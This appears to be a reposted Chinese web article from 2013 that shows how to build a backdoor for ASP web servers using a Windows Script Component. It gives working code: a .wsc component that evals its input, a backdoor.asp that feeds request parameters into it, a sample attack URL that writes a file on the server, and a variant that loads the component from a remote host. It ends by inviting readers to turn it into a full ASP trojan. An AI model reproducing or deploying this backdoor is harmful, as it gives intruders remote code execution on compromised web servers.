利用wsc制作的一个asp后门
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| <?xml version="1.0" encoding="gb2312" standalone="yes"?> <?component error="true" debug="true"?> <package> <component id="haiyangtop"> <public> <method name="lcx"><parameter name="b"/></method> </public> <script language="VBScript"><![CDATA[ sub lcx(b) eval(b) end sub ]]> </script> </component> </package> backdoor.asp内容如下: <% b=request("a") Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop") fs.lcx(b) %> 调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123") 注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。 如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像 Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。 算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: vbs实现的定时关机、重启的脚本和程序下一篇: 一个查看局域网在线IP的vbs脚本
关于利用wsc制作的一个asp后门的所有评论
